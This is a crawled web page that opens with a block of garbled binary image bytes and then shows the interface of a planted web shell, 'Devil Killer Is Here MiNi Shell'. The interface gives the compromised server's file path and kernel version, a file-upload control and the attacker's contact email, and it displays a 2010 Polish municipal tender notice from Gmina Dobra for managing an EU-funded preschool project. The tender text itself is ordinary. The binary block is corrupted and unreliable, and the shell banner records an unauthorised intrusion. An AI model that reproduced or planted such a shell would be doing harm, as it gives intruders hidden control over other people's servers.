JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100715/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100715/189331-N-2010.html

<p class="kh_header"><b>Dobra: Pełnienie funkcji koordynatora projektu, asystenta projektu oraz specjalisty  ds. obsługi finansowo - księgowej w ramach projektu  pn. Wszystko zaczyna się od przedszkola współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 189331 - 2010; data zamieszczenia: 15.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dobra , plac Wojska Polskiego 10, 62-730 Dobra, woj. wielkopolskie, tel. 0-63 279-90-11, faks 0-63 279-90-11.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji koordynatora projektu, asystenta projektu oraz specjalisty  ds. obsługi finansowo - księgowej w ramach projektu  pn. Wszystko zaczyna się od przedszkola współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.	Przedmiot zamówienia.
3.1	Opis przedmiotu zamówienia: pełnienie funkcji koordynatora projektu, asystenta projektu oraz specjalisty ds. obsługi finansowo - księgowej w ramach projektu pn. Wszystko zaczyna się od przedszkola współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego.
3.2	Projekt  Wszystko zaczyna się od przedszkola współfinansowany ze środków Europejskiego Funduszu Społecznego realizowany w ramach Programu Operacyjnego Kapitał Ludzki Priorytetu, IX Rozwój wykształcenia i kompetencji w regionach,  Działania 9.1 wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałania 9.1.1 zminiejszenie nierówności w stopniu upowszechniania edukacji przedszkolnej, Programu Operacyjnego Kapitał Ludzki.
3.3	Dane dotyczące projektu:
3.3.1	Projekt realizowany jest w gminie Dobra;
3.3.2	Wartość projektu - 1.202.210,00 zł.;
3.3.3	Liczba placówek oświatowych objętych projektem - 4;
3.3.4	Liczba dzieci i ich rodziców objętych projektem - 150;
3.4	Zakresy obowiązków i czynności: 
3.4.1	Część I - Koordynator projektu:
3.4.1.1	Przejęcie odpowiedzialności za całość realizacji projektu, w szczególności zarządzanie przedsięwzięciami na wszystkich jego etapach;
3.4.1.2	Terminowe i właściwe realizowanie całości projektu, w szczególności zarządzanie przedsięwzięciami na wszystkich jego etapach; 
3.4.1.3	Koordynowanie działań projektowych; 
3.4.1.4	Nadzór nad zgodnością prowadzonych działań z zapisami zawartymi we wniosku, w tym budżetem i harmonogramem;
3.4.1.5	Kierowanie wykonaniem projektu w formie nadzoru merytorycznego 
i technicznego zgodnie z harmonogramem realizacji projektu, z zawartą umową o dofinansowanie projektu oraz wnioskiem  aplikacyjnym i przepisami krajowymi i Unii Europejskiej;
3.4.1.6	Nadzorowanie bieżących postępów w realizacji projektu;
3.4.1.7	Nadzór nad całością prac związanych z realizacją projektu i ich jakością;
3.4.1.8	Zarządzanie planowanymi działaniami projektowymi;
3.4.1.9	Koordynacja prac zespołu projektowego i podejmowanie decyzji;
3.4.1.10	Dokonywanie podziału obowiązków pomiędzy członków zespołu projektowego;
3.4.1.11	Nadzorowanie pracy wszystkich osób zaangażowanych w realizację projektu;
3.4.1.12	Koordynacja działań merytorycznych i logistycznych związanych z projektem;
3.4.1.13	Utrzymywanie stałych kontaktów z opiekunami projektu w Instytucji Pośredniczącej, informowanie na bieżąco o wszystkich zaistniałych problemach w realizacji projektu, terminowe przesyłanie wszystkich wymaganych dokumentów i informacji, przestrzeganie obowiązków i zaleceń wynikających z realizacji umowy, procedur, standardów, instrukcji do sprawozdań oraz innych obowiązujących dokumentów;
3.4.1.14	Nadzorowanie  terminowego  sporządzania wniosków o płatność wraz z zebraniem wszystkich załączników;
3.4.1.15	Nadzorowanie przygotowania i realizacji zamówień publicznych zgodnie z ustawą Prawo Zamówień Publicznych w zakresie działań projektowych;
3.4.1.16	Przygotowywanie i koordynacja korespondencji związanej z projektem do Instytucji Pośredniczącej;
3.4.1.17	Planowanie działań i wywiązywanie się ze wskaźników;
3.4.1.18	Kierowanie bieżącymi sprawami związanymi z realizacją projektu;
3.4.1.19	Poddanie się kontroli prowadzonej przez organy wewnętrzne i instytucje zewnętrzne w zakresie realizacji projektu;
3.4.1.20	Obecność podczas kontroli projektu;
3.4.1.21	Współpraca z kierownikami przedszkolnymi i  osobami realizującymi zajęcia w zakresie przygotowania szczegółowych programów zajęć;
3.4.1.22	Nadzorowanie przebiegu zajęć;
3.4.1.23	Nadzór nad jakością materiałów dydaktycznych;
3.4.1.24	Nadzór nad opracowaniem szczegółowego harmonogramu zajęć;
3.4.1.25	Nadzór nad zaprojektowaniem ankiet ewaluacyjnych dla potrzeb ewaluacji;
3.4.1.26	Nadzór na monitoringiem i ewaluacją projektu oraz jego promocja;
3.4.1.27	Kontrola wydatkowania środków;
3.4.2	Część II - Asystent projektu:
3.4.2.1	Bieżąca realizacja zadań wynikających z projektu i współpraca z Koordynatorem projektu;
3.4.2.2	Nadzór nad zgodnością prowadzonych działań z zapisami zawartymi we wniosku, w tym budżetem i harmonogramem;
3.4.2.3	Nadzór nad realizacją projektu w części merytorycznej i finansowej zgodnie z harmonogramem realizacji projektu, z zawartą umową o dofinansowanie projektu oraz wnioskiem aplikacyjnym i przepisami krajowymi i Unii Europejskiej;
3.4.2.4	Zarządzanie planowanymi działaniami merytorycznymi i finansowymi projektu;
3.4.2.5	Wykonywanie czynności administracyjnych związanych z realizacją projektu;
3.4.2.6	Prowadzenie bieżącej dokumentacji projektu w oparciu o obowiązujące zapisy;
3.4.2.7	Sporządzanie  wniosków o płatność wraz z zebraniem wszystkich załączników;
3.4.2.8	Sporządzanie sprawozdań z realizacji projektu we współpracy z Koordynatorem projektu w zakresie realizacji zaplanowanych działań w projekcie;
3.4.2.9	Wspieranie działań Koordynatora projektu, w odniesieniu do poszczególnych zadań objętych projektem, a także okresowe dokonywanie przeglądów realizacji projektów;
3.4.2.10	Nadzór nad prowadzeniem dokumentacji merytorycznej projektu;
3.4.2.11	Nadzór nad odpowiednim opisywaniem dokumentów związanych                   z realizacją projektu, zgodnie z wytycznymi;
3.4.2.12	Poddanie się kontroli prowadzonej przez organy wewnętrzne                         i instytucje zewnętrzne w zakresie realizacji projektu;
3.4.2.13	Kontrola poprawności dokonanej klasyfikacji dokumentów z uwagi na: nazwę projektu, kwotę wynikającą z budżetu projektu a wielkością zrealizowaną, źródło finansowania, pozycje budżetowe, podział na wydatki kwalifikowane, kategorie dodatkowe, zależnie od potrzeb projektu;
3.4.2.14	Dokonywanie wspólnie z Koordynatorem kontroli księgowania kosztów projektu pod kątem spełnienia kryteriów dla tzw. wydatków kwalifikowanych, a w szczególności sprawdzenia czy są: konieczne dla wykonania zadań określonych projektem; związane z finansowaniem umów zawartych przez zamawiającego w celu osiągnięcia zadań wynikających z opisu projektu i są związane z realizacją projektu; udokumentowane odpowiednimi i prawidłowo sporządzonymi dokumentami źródłowymi;
3.4.2.15	Nadzór nad prawidłowym oznaczeniem i opisywaniem dokumentów przetwarzanych przy realizacji projektu;
3.4.2.16	Przygotowanie raportów o merytorycznym i finansowym postępie w realizacji projektu na wezwanie Koordynatora; 
3.4.2.17	Zapobieganie powstawaniu nieprawidłowości finansowych                           oraz merytorycznych i raportowanie ich wystąpienia; 
3.4.2.18	Przestrzeganie procedur i instrukcji związanych z realizacją projektu.
3.4.3	Część III - Specjalista ds. obsługi finansowo - księgowej projektu:
3.4.3.1	Wspieranie działań Koordynatora i Asystenta projektu w aspekcie księgowym, w odniesieniu do poszczególnych zadań objętych projektem, a także okresowe dokonywanie przeglądów realizacji projektu;
3.4.3.2	Sporządzenie sprawozdań okresowych;
3.4.3.3	Prowadzenie dokumentacji księgowej projektu zgodnie                                    z obowiązującymi przepisami finansowymi, w tym opisywanie faktur;
3.4.3.4	Współpraca w zakresie księgowania i realizacji płatności projektu                   z Referatem  Finansowo-Podatkowym Urzędu Miejskiego w Dobrej;
3.4.3.5	Współpraca w zakresie księgowości z Instytucją Pośredniczącą;
3.4.3.6	Kontrola poprawności formalnej księgowych i finansowych dokumentów projektu;
3.4.3.7	Odpowiednie opisywanie dokumentów związanych z realizacją projektu, zgodnie z wytycznymi;
3.4.3.8	Kontrola poprawności dokonanej klasyfikacji dokumentów z uwagi na: nazwę projektu, kwotę wynikającą z budżetu projektu a wielkością zrealizowaną, źródło finansowania, pozycje budżetowe projektów, podział na wydatki kwalifikowane, kategorie dodatkowe (zależnie od potrzeb projektu);
3.4.3.9	Dokonywanie kontroli księgowania kosztów projektu pod kątem spełnienia kryteriów dla tzw. wydatków kwalifikowanych,                                  a w szczególności sprawdzenia czy są: konieczne dla wykonania zadań określonych projektem; związane z finansowaniem umów zawartych przez zamawiającego w celu osiągnięcia zadań wynikających z opisu projektu i są związane z realizacją projektu; udokumentowane odpowiednimi i prawidłowo sporządzonymi dokumentami źródłowymi;
3.4.3.10	Sporządzanie zestawień dokumentów rozliczeniowych przedstawiających wykorzystanie środków realizowanego projektu;
3.4.3.11	Sporządzanie  wniosków o płatność wraz z zebraniem wszystkich załączników;
3.4.3.12	Przygotowanie raportów o finansowym postępie w realizacji projektu; 
3.4.3.13	Zapobieganie powstawaniu nieprawidłowości finansowych                              i raportowanie ich wystąpienia;
3.4.3.14	Weryfikacja faktur pod względem formalno-rachunkowym                               i prawidłowości rozliczeń finansowych uwzględniających wszystkie źródła finansowania;
3.4.3.15	Nadzór nad płatnościami dla wykonawców;
3.4.3.16	Przestrzeganie procedur i instrukcji związanych z realizacją projektu;
3.4.3.17	Współpraca z Koordynatorem Projektu i Asystentem Koordynatora                   w celu zapewnienia prawidłowego przepływu informacji;
3.4.3.18	Współpraca z organami kontrolującymi.
3.4.3.19	Rejestracja faktur i rachunków wpływających;
3.5	Wykonywanie zleconych zadań odbywać się będzie w siedzibie Zamawiającego przez czas trwanie umowy we wszystkie dni z wyłączeniem dni ustawowo wolnych od pracy, również w godzinach popołudniowych. W przypadku kolizji świadczeń, świadczenie na rzecz Zamawiającego posiada pierwszeństwo przed świadczeniami na rzecz osób trzecich. Wykonawcy przyjmujący obowiązki związane z prowadzeniem Projektu będą zatrudnieni przez Zamawiającego na podstawie umowy zlecenia. Wykonawców obowiązuje należyta staranność w wykonywaniu przedmiotu zamówienia. Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawców podczas wykonywania przedmiotu zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1, 79.21.10.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 02.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek powyższy zostanie spełniony, jeżeli Wykonawca wykaże i udokumentuje wykonanie usług w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali należycie:
14.1.2.1 Część I - koordynator projektu -  udział w realizacji min. 1 projektu współfinansowanego ze środków UE.
14.1.2.2 Część II - asystent koordynatora -  udział w realizacji min. 1 projektu współfinansowanego ze środków UE.
14.1.2.3 Część III - Specjalista ds. obsługi finansowo - księgowej projektu - udział w realizacji min. 1 projektu współfinansowanego ze środków UE</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek powyższy zostanie spełniony, jeżeli Wykonawca wykaże osoby, które będą uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakres wykonywanych przez nich czynności oraz informacją o podstawie do dysponowania tymi osobami. W szczególności Wykonawca wykaże, że dysponuje min 1 osobą w każdej części posiadającą następujące kwalifikacje zawodowe, wykształcenie i staż pracy:
14.1.4.1	Część I - koordynator projektu:
14.1.4.1.1	wykształceniu wyższym magisterskim,
14.1.4.1.2	doświadczeniu zawodowym w administracji samorządowej           ( minimum 10 lat ), w tym na stanowisku związanym                  z zarządzaniem i nadzorowaniem przedszkoli, szkół podstawowych lub gimnazjów ( minimum 5 lat ),
14.1.4.1.3	znajomości zasad i procedur realizacji projektów współfinansowanych ze środków Unii Europejskiej, 
14.1.4.1.4	znajomości przepisów ustawy Prawo zamówień publicznych oraz ustawy o finansach publicznych, 
14.1.4.1.5	umiejętności obsługi komputera, 
14.1.4.1.6	ukończeniu co najmniej 2 szkoleń/kursów/seminariów/konferencji z zakresu funduszy unijnych (zarządzania funduszami/ możliwości pozyskiwania i rozliczania funduszy),
14.1.4.1.7	ukończeniu co najmniej 3 szkoleń/kursów/seminariów/konferencji z zakresu zarządzania oświatą i 1 z zakresu edukacji przedszkolnej,  
14.1.4.2	Część II - asystent projektu:  
14.1.4.2.1	wykształceniu wyższym magisterskim,
14.1.4.2.2	doświadczeniu zawodowym na stanowisku związanym                   z pozyskiwaniem funduszy zewnętrznych  (minimum 5 lat),
14.1.4.2.3	ukończeniu co najmniej 2 szkoleń/kursów/seminariów                   z zakresu funduszy unijnych (zarządzania funduszami/ możliwości pozyskiwania i rozliczania funduszy/) 
14.1.4.2.4	znajomości zasad i procedur realizacji projektów współfinansowanych ze środków Unii Europejskiej, 
14.1.4.2.5	znajomości przepisów ustawy Prawo zamówień publicznych oraz ustawy o finansach publicznych, 
14.1.4.2.6	umiejętności obsługi komputera,
14.1.4.3	Część III -  Specjalista ds. obsługi finansowo - księgowej projektu:
14.1.4.3.1	wykształceniu wyższym magisterskim, 
14.1.4.3.2	doświadczeniu zawodowym w administracji samorządowej             ( minimum 5 lat ) w tym na stanowisku związanym z zagadnieniami finansowo - księgowymi ( minimum 3 lata ),
14.1.4.3.3	ukończeniu co najmniej 2 szkolenia/kursu/seminarium                                 z zakresu funduszy unijnych ( zarządzanie funduszami, możliwości pozyskiwania i rozliczania funduszy), 
14.1.4.3.4	znajomości zasad i procedur realizacji projektów współfinansowanych ze środków Unii Europejskiej, 
14.1.4.3.5	znajomości przepisów ustawy o finansach publicznych, 
14.1.4.3.6	umiejętności obsługi komputera w tym znajomość obsługi programu księgowego. 
14.1.4.3.7	posiada świadectwo kwalifikacyjne uprawniające do usługowego prowadzenia ksiąg rachunkowych lub certyfikat księgowy, wydane na podstawie odrębnych przepisów</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Doświadczenie zawodowe - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://dobra.nowoczesnagmina.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Dobrej, pl. Wojska Polskiego 10, 62-730 Dobra, pok. nr 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.07.2010 godzina 08:00, miejsce: Urząd Miejski w Dobrej, pl. Wojska Polskiego 10, 62-730 Dobra, Sekretariat pok. nr 8.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 3.2	Projekt  Wszystko zaczyna się od przedszkola współfinansowany ze środków Europejskiego Funduszu Społecznego realizowany w ramach Programu Operacyjnego Kapitał Ludzki Priorytetu, IX Rozwój wykształcenia i kompetencji w regionach,  Działania 9.1 wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałania 9.1.1 zminiejszenie nierówności w stopniu upowszechniania edukacji przedszkolnej, Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com